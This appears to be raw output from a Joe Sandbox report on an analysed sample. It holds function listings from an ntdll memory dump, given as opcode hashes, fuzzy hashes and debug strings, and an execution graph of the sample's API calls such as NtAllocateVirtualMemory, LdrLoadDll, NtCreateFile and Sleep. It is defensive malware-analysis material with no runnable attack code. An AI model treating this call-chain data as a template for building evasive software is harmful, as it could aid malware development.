                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0b93f297e3e2f50e05a51cb03ccaac2c37ec791f98cd17bae823045b6304c202
                                                                                                                      • Instruction ID: bb4316d7e9bbcc17efa0a3d6f1de1a511839f4d4abe3c0a64946b92c046365f7
                                                                                                                      • Opcode Fuzzy Hash: 0b93f297e3e2f50e05a51cb03ccaac2c37ec791f98cd17bae823045b6304c202
                                                                                                                      • Instruction Fuzzy Hash: FC90022120184542D14072584804B0F811597F5202F95C11AB415A555CCA2589566721
                                                                                                                      Function 01423090 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 81088192d17dbd2a28913638a4dc94a4ba718549483ddf317ba38a4a77528030
                                                                                                                      • Instruction ID: c06d983edff15eb4694ff6f5b5e335fd7e00b7e6f7a4af2a4ecee0278edafecc
                                                                                                                      • Opcode Fuzzy Hash: 81088192d17dbd2a28913638a4dc94a4ba718549483ddf317ba38a4a77528030
                                                                                                                      • Instruction Fuzzy Hash: 7890022124140902D140715884147074016D7E4601F55C112B0028555DC7268A6677B1
                                                                                                                      Function 014239B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 461afdbc4b41a01b2b2e5a79729a26c66f3b2e47d232fa8cdd068366ebc4432b
                                                                                                                      • Instruction ID: 70fc9774b09544175c8f2e89473503c7ba5a698138147fd969ba10e457e8ee65
                                                                                                                      • Opcode Fuzzy Hash: 461afdbc4b41a01b2b2e5a79729a26c66f3b2e47d232fa8cdd068366ebc4432b
                                                                                                                      • Instruction Fuzzy Hash: 7190022124545202D150715C44046168015B7F4201F55C122B0818595DC66589567321
                                                                                                                      Function 01423D70 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0aa3a1111b8f87e776a8be963696618dbcb66972c8d0be9bf6a1c970a77b8ab6
                                                                                                                      • Instruction ID: b7d177fb80ad9f0cce620e4d2c7afdf9b4ed8dafc4caa90f0296daa2b775bec0
                                                                                                                      • Opcode Fuzzy Hash: 0aa3a1111b8f87e776a8be963696618dbcb66972c8d0be9bf6a1c970a77b8ab6
                                                                                                                      • Instruction Fuzzy Hash: 4E90023520140502D51071585804646405697E4301F55D512B0428559DC76489A2B221
                                                                                                                      Function 01423D10 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e609000879f14c1d875a8ba344880db99ee9ed3e9ad897fc98caf8af794755d0
                                                                                                                      • Instruction ID: 8151441d0d5afaad8e7c87d694ca9d6167130c5449e87cf0441e26282bb81bb7
                                                                                                                      • Opcode Fuzzy Hash: e609000879f14c1d875a8ba344880db99ee9ed3e9ad897fc98caf8af794755d0
                                                                                                                      • Instruction Fuzzy Hash: 0990023120240242954072585804A4E811597F5302B95D516B0019555CCA2489626321
                                                                                                                      Function 01422C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                      • Instruction ID: 979be13648effb931f065e19da141a5d03dbee761b8e7a568487bec3bf28b0a2
                                                                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Function 01422890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                      • Opcode ID: bfe7ed5e5f83dd8b8794a0a99e09f89fafac69ea686b069dc8ba205f7e7047a7
                                                                                                                      • Instruction ID: 41d0ff9fe66695e44b2edc8830113776610df93d09c97837273899713b579d37
                                                                                                                      • Opcode Fuzzy Hash: bfe7ed5e5f83dd8b8794a0a99e09f89fafac69ea686b069dc8ba205f7e7047a7
                                                                                                                      • Instruction Fuzzy Hash: 2951E7B2B001266FCB21DB9D8880D7FFBB8BB49244794822BF555D7752D3B4DE408BA0
                                                                                                                      Function 01492410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                      • Opcode ID: a9f1509a1c7f2991646875c40ca5e1bc0575344ded0a5853ad5c8cbdbe0371ab
                                                                                                                      • Instruction ID: ceeb45a59c8f00879b502ef51e8b4954bfd7c850f1537c6d03124f27757cb24b
                                                                                                                      • Opcode Fuzzy Hash: a9f1509a1c7f2991646875c40ca5e1bc0575344ded0a5853ad5c8cbdbe0371ab
                                                                                                                      • Instruction Fuzzy Hash: 8851E4B5A00645BFCF20DE9DC990D7FBFB8AB48204B04846FE596D7792E6B4DA008760
                                                                                                                      Function 01417630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01454725
                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 014546FC
                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 01454787
                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01454742
                                                                                                                      • ExecuteOptions, xrefs: 014546A0
                                                                                                                      • Execute=1, xrefs: 01454713
                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01454655
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                      • API String ID: 0-484625025
                                                                                                                      • Opcode ID: 0f8733e55a61858505011a77170340b99865de0471c335688fc05fcb437a98f8
                                                                                                                      • Instruction ID: 6075f36b986e737bceeb5581a37f86dada096b8e536bf61eb58d3d8429467c97
                                                                                                                      • Opcode Fuzzy Hash: 0f8733e55a61858505011a77170340b99865de0471c335688fc05fcb437a98f8
                                                                                                                      • Instruction Fuzzy Hash: 9A516E3160021ABAEF10ABA9EC95FBE77A8EF14715F04049FD509A72B1EB709E458F50
                                                                                                                      Function 014B6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                      • Instruction ID: 927ebe366d2ff26bac203d02096a2f9a75055a40fda8222d06c3517b20a8938d
                                                                                                                      • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                      • Instruction Fuzzy Hash: 38022571508342AFD705CF19C490AAFBBE5EFD8710F41892EFA894B264DB31E945CB62
                                                                                                                      Function 0142B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __aulldvrm
                                                                                                                      • String ID: +$-$0$0
                                                                                                                      • API String ID: 1302938615-699404926
                                                                                                                      • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                      • Instruction ID: e7ab0a6ee1ad5f8f85b2224bea3a03d0f928fcaf4b9023cc5a056e561a8beca7
                                                                                                                      • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                      • Instruction Fuzzy Hash: 4881C130E052698EEF258E6CC8507FEBBB1EF85320F98415BD865A73A1C77488C1CB52
                                                                                                                      Function 014920E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: %%%u$[$]:%u
                                                                                                                      • API String ID: 48624451-2819853543
                                                                                                                      • Opcode ID: 9e52dcc75b3dd8f74c23e6053931db70cbd6bc4382ae73f6e0a8eeb024dc4775
                                                                                                                      • Instruction ID: 7efd964a9fbec818e44138362cfd6ddde2f4537119b09494e8531bb78393c449
                                                                                                                      • Opcode Fuzzy Hash: 9e52dcc75b3dd8f74c23e6053931db70cbd6bc4382ae73f6e0a8eeb024dc4775
                                                                                                                      • Instruction Fuzzy Hash: CC2153BAA00119ABDB10DF69D841EAFBFF8EF58654F45011BE905D3214E770D9118BA1
                                                                                                                      Function 0140F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 014502BD
                                                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 014502E7
                                                                                                                      • RTL: Re-Waiting, xrefs: 0145031E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                      • API String ID: 0-2474120054
                                                                                                                      • Opcode ID: f9d555e8d86369ca556d0437d2eb533fbd8fbe492756b483c89979f58ad69a9b
                                                                                                                      • Instruction ID: 25f766ff5fa29ab00c18cdf0bec653ed9ae48002389cc119f9cebf5d5e086930
                                                                                                                      • Opcode Fuzzy Hash: f9d555e8d86369ca556d0437d2eb533fbd8fbe492756b483c89979f58ad69a9b
                                                                                                                      • Instruction Fuzzy Hash: 75E19E356047419FD726CF29C884B2ABBE0BB84314F140A6EF9958B3F2D775D94ACB42
                                                                                                                      Function 0141BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • RTL: Resource at %p, xrefs: 01457B8E
                                                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01457B7F
                                                                                                                      • RTL: Re-Waiting, xrefs: 01457BAC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                      • API String ID: 0-871070163
                                                                                                                      • Opcode ID: 303af6dd3cf8994dcc7c7a41563326f2a9cad2c3d44aada3b0f4487d1fa3f038
                                                                                                                      • Instruction ID: 82409cb1f453da9dba0228029d00047a37d1f189b6ba6e6b2ec3bf56036d8556
                                                                                                                      • Opcode Fuzzy Hash: 303af6dd3cf8994dcc7c7a41563326f2a9cad2c3d44aada3b0f4487d1fa3f038
                                                                                                                      • Instruction Fuzzy Hash: 2D41E4317007029FD720CE2AD850B6BB7E5EF98725F100A2EF956DB7A1DB71E8058B91
                                                                                                                      Function 0141B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0145728C
                                                                                                                      Strings
                                                                                                                      • RTL: Resource at %p, xrefs: 014572A3
                                                                                                                      • RTL: Re-Waiting, xrefs: 014572C1
                                                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01457294
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                      • API String ID: 885266447-605551621
                                                                                                                      • Opcode ID: 861e3b1bfda604aac3435d225d7b3c84582cee0418e2fa1f011e7b6222065e21
                                                                                                                      • Instruction ID: ca3ebb3c647a6a9d02252877bf61e769ea36804eec73d08108d3bde2a832e3f5
                                                                                                                      • Opcode Fuzzy Hash: 861e3b1bfda604aac3435d225d7b3c84582cee0418e2fa1f011e7b6222065e21
                                                                                                                      • Instruction Fuzzy Hash: 9B41E131740202ABC720CF2ACC41B6AB7A5FBA4755F10462EFD55EB761DB31E8468BD1
                                                                                                                      Function 01492300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: %%%u$]:%u
                                                                                                                      • API String ID: 48624451-3050659472
                                                                                                                      • Opcode ID: 668beb27cf55fd061ba03145bb6718f2c450fb942acca00be84e945fb2642748
                                                                                                                      • Instruction ID: 1a74f6beacafb2a4ceceb9b51eeb09fea572b3b54a610d5cf32c17e022442fe0
                                                                                                                      • Opcode Fuzzy Hash: 668beb27cf55fd061ba03145bb6718f2c450fb942acca00be84e945fb2642748
                                                                                                                      • Instruction Fuzzy Hash: 2E315772A00119AFDF60DE3DDC40FEF7BF8EB54610F44455AE949E3250EB709A458BA0
                                                                                                                      Function 01427D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __aulldvrm
                                                                                                                      • String ID: +$-
                                                                                                                      • API String ID: 1302938615-2137968064
                                                                                                                      • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                      • Instruction ID: ca0aa5647f3562ae376bd7238e33250a16291b3a5f8b0be8323070905b6691c4
                                                                                                                      • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                      • Instruction Fuzzy Hash: D691C570E042369BDB24CF6DC891ABFBBA1AF64322F95451BE955E73E0D73089C18721
                                                                                                                      Function 013E9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $$@
                                                                                                                      • API String ID: 0-1194432280
                                                                                                                      • Opcode ID: dddc6f0145fe4c0e6ccd5abab36da600661536835c26219a9d906b92f3cd8355
                                                                                                                      • Instruction ID: 6c4d236ee55dfcc3232aafd40b56e93a5c682e715b5c0407d8a43595434a24b4
                                                                                                                      • Opcode Fuzzy Hash: dddc6f0145fe4c0e6ccd5abab36da600661536835c26219a9d906b92f3cd8355
                                                                                                                      • Instruction Fuzzy Hash: 1D812A71D002699BDB31CB54DC44BEEB7B8AB08754F0041EAEA1DB7290D7709E84CFA0

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:2.6%
                                                                                                                      Dynamic/Decrypted Code Coverage:4.2%
                                                                                                                      Signature Coverage:1.6%
                                                                                                                      Total number of Nodes:450
                                                                                                                      Total number of Limit Nodes:76
                                                                                                                      execution_graph 97737 270b2f0 97740 272b260 97737->97740 97739 270c961 97743 2729390 97740->97743 97742 272b291 97742->97739 97744 2729425 97743->97744 97746 27293be 97743->97746 97745 272943b NtAllocateVirtualMemory 97744->97745 97745->97742 97746->97742 98050 271feb0 98051 271fecd 98050->98051 98052 27143a0 LdrLoadDll 98051->98052 98053 271feeb 98052->98053 98054 271ab30 98059 271a840 98054->98059 98056 271ab3d 98073 271a4c0 98056->98073 98058 271ab59 98060 271a865 98059->98060 98084 2718160 98060->98084 98063 271a9b3 98063->98056 98065 271a9ca 98065->98056 98066 271a9c1 98066->98065 98068 271aab7 98066->98068 98103 2719f10 98066->98103 98070 271ab1a 98068->98070 98112 271a280 98068->98112 98071 272b2f0 RtlFreeHeap 98070->98071 98072 271ab21 98071->98072 98072->98056 98074 271a4d3 98073->98074 98077 271a4de 98073->98077 98075 272b3d0 RtlAllocateHeap 98074->98075 98075->98077 98076 271a502 98076->98058 98077->98076 98078 2718160 GetFileAttributesW 98077->98078 98079 271a812 98077->98079 98082 2719f10 RtlFreeHeap 98077->98082 98083 271a280 RtlFreeHeap 98077->98083 98078->98077 98080 272b2f0 RtlFreeHeap 98079->98080 98081 271a828 98079->98081 98080->98081 98081->98058 98082->98077 98083->98077 98085 2718181 98084->98085 98086 2718188 GetFileAttributesW 98085->98086 98087 2718193 98085->98087 98086->98087 98087->98063 98088 27230a0 98087->98088 98089 27230ae 98088->98089 98090 27230b5 98088->98090 98089->98066 98091 27143a0 LdrLoadDll 98090->98091 98092 27230ea 98091->98092 98093 27230f9 98092->98093 98116 2722b60 LdrLoadDll 98092->98116 98094 272b3d0 RtlAllocateHeap 98093->98094 98099 27232a7 98093->98099 98096 2723112 98094->98096 98097 272329d 98096->98097 98096->98099 98100 272312e 98096->98100 98098 272b2f0 RtlFreeHeap 98097->98098 98097->98099 98098->98099 98099->98066 98100->98099 98101 272b2f0 RtlFreeHeap 98100->98101 98102 2723291 98101->98102 98102->98066 98104 2719f36 98103->98104 98117 271d920 98104->98117 98106 2719fa8 98108 271a130 98106->98108 98109 2719fc6 98106->98109 98107 271a115 98107->98066 98108->98107 98110 2719dd0 RtlFreeHeap 98108->98110 98109->98107 98122 2719dd0 98109->98122 98110->98108 98113 271a2a6 98112->98113 98114 271d920 RtlFreeHeap 98113->98114 98115 271a32d 98114->98115 98115->98068 98116->98093 98119 271d944 98117->98119 98118 271d951 98118->98106 98119->98118 98120 272b2f0 RtlFreeHeap 98119->98120 98121 271d994 98120->98121 98121->98106 98123 2719ded 98122->98123 98126 271d9b0 98123->98126 98125 2719ef3 98125->98109 98127 271d9d4 98126->98127 98128 272b2f0 RtlFreeHeap 98127->98128 98129 271da7e 98127->98129 98128->98129 98129->98125 97747 2728670 97748 27286fc 97747->97748 97750 272869b 97747->97750 97752 46d2ee0 LdrInitializeThunk 97748->97752 97749 272872d 97752->97749 97753 2721870 97758 2721889 97753->97758 97754 2721919 97755 27218d1 97761 272b2f0 97755->97761 97758->97754 97758->97755 97759 2721914 97758->97759 97760 272b2f0 RtlFreeHeap 97759->97760 97760->97754 97764 2729590 97761->97764 97763 27218e1 97765 27295aa 97764->97765 97766 27295bb RtlFreeHeap 97765->97766 97766->97763 97767 27287f0 97768 272880d 97767->97768 97771 46d2df0 LdrInitializeThunk 97768->97771 97769 2728835 97771->97769 97772 272c3f0 97773 272b2f0 RtlFreeHeap 97772->97773 97774 272c405 97773->97774 98135 2725db0 98136 2725e0a 98135->98136 98138 2725e17 98136->98138 98139 27237c0 98136->98139 98140 272b260 NtAllocateVirtualMemory 98139->98140 98141 2723801 98140->98141 98142 27143a0 LdrLoadDll 98141->98142 98144 272390e 98141->98144 98145 2723847 98142->98145 98143 2723890 Sleep 98143->98145 98144->98138 98145->98143 98145->98144 98146 27125b8 98147 27160f0 2 API calls 98146->98147 98148 27125e0 98147->98148 97775 27199fa 97776 2719a10 97775->97776 97777 2719a15 97775->97777 97778 2719a49 97777->97778 97779 272b2f0 RtlFreeHeap 97777->97779 97779->97778 97782 2716f60 97783 2716f7c 97782->97783 97791 2716fcf 97782->97791 97783->97791 97792 2729220 97783->97792 97784 2717107 97786 2716f97 97795 2716380 NtClose LdrInitializeThunk LdrInitializeThunk 97786->97795 97788 27170e1 97788->97784 97797 2716550 NtClose LdrInitializeThunk LdrInitializeThunk 97788->97797 97791->97784 97796 2716380 NtClose LdrInitializeThunk LdrInitializeThunk 97791->97796 97793 272923a 97792->97793 97794 272924b NtClose 97793->97794 97794->97786 97795->97791 97796->97788 97797->97784 97798 27159e0 97803 2717ef0 97798->97803 97800 2715a10 97802 2715a3c 97800->97802 97807 2717e70 97800->97807 97804 2717f03 97803->97804 97814 2728740 97804->97814 97806 2717f2e 97806->97800 97808 2717eb4 97807->97808 97813 2717ed5 97808->97813 97820 2728510 97808->97820 97810 2717ec5 97811 2717ee1 97810->97811 97812 2729220 NtClose 97810->97812 97811->97800 97812->97813 97813->97800 97815 27287be 97814->97815 97817 272876e 97814->97817 97819 46d2dd0 LdrInitializeThunk 97815->97819 97816 27287e3 97816->97806 97817->97806 97819->97816 97821 272858a 97820->97821 97822 272853b 97820->97822 97825 46d4650 LdrInitializeThunk 97821->97825 97822->97810 97823 27285af 97823->97810 97825->97823 97826 271f5e0 97827 271f644 97826->97827 97855 27160f0 97827->97855 97829 271f77e 97830 271f777 97830->97829 97862 2716200 97830->97862 97832 271f923 97833 271f932 97835 2729220 NtClose 97833->97835 97834 271f7fa 97834->97832 97834->97833 97866 271f3c0 97834->97866 97837 271f93c 97835->97837 97838 271f836 97838->97833 97839 271f841 97838->97839 97875 272b3d0 97839->97875 97841 271f86a 97842 271f873 97841->97842 97843 271f889 97841->97843 97844 2729220 NtClose 97842->97844 97878 271f2b0 CoInitialize 97843->97878 97846 271f87d 97844->97846 97847 271f897 97881 2728ce0 97847->97881 97849 271f912 97850 2729220 NtClose 97849->97850 97851 271f91c 97850->97851 97852 272b2f0 RtlFreeHeap 97851->97852 97852->97832 97853 271f8b5 97853->97849 97854 2728ce0 LdrInitializeThunk 97853->97854 97854->97853 97856 2716123 97855->97856 97857 2716147 97856->97857 97885 2728d90 97856->97885 97857->97830 97859 271616a 97859->97857 97860 2729220 NtClose 97859->97860 97861 27161ea 97860->97861 97861->97830 97863 2716225 97862->97863 97890 2728b60 97863->97890 97867 271f3dc 97866->97867 97895 27143a0 97867->97895 97869 271f403 97869->97838 97870 271f3fa 97870->97869 97871 27143a0 LdrLoadDll 97870->97871 97872 271f4ce 97871->97872 97873 27143a0 LdrLoadDll 97872->97873 97874 271f52b 97872->97874 97873->97874 97874->97838 97900 2729540 97875->97900 97877 272b3eb 97877->97841 97880 271f315 97878->97880 97879 271f3ab CoUninitialize 97879->97847 97880->97879 97882 2728cfd 97881->97882 97903 46d2ba0 LdrInitializeThunk 97882->97903 97883 2728d2d 97883->97853 97886 2728dad 97885->97886 97889 46d2ca0 LdrInitializeThunk 97886->97889 97887 2728dd9 97887->97859 97889->97887 97891 2728b7a 97890->97891 97894 46d2c60 LdrInitializeThunk 97891->97894 97892 2716299 97892->97834 97894->97892 97897 27143c4 97895->97897 97896 27143cb 97896->97870 97897->97896 97898 2714400 LdrLoadDll 97897->97898 97899 2714417 97897->97899 97898->97899 97899->97870 97901 272955d 97900->97901 97902 272956e RtlAllocateHeap 97901->97902 97902->97877 97903->97883 97904 27214e0 97905 27214fc 97904->97905 97906 2721524 97905->97906 97907 2721538 97905->97907 97908 2729220 NtClose 97906->97908 97909 2729220 NtClose 97907->97909 97910 272152d 97908->97910 97911 2721541 97909->97911 97914 272b410 RtlAllocateHeap 97911->97914 97913 272154c 97914->97913 98154 2728f20 98155 2728fd4 98154->98155 98157 2728f4f 98154->98157 98156 2728fea NtCreateFile 98155->98156 97915 2712162 97916 271210f 97915->97916 97917 271216d 97915->97917 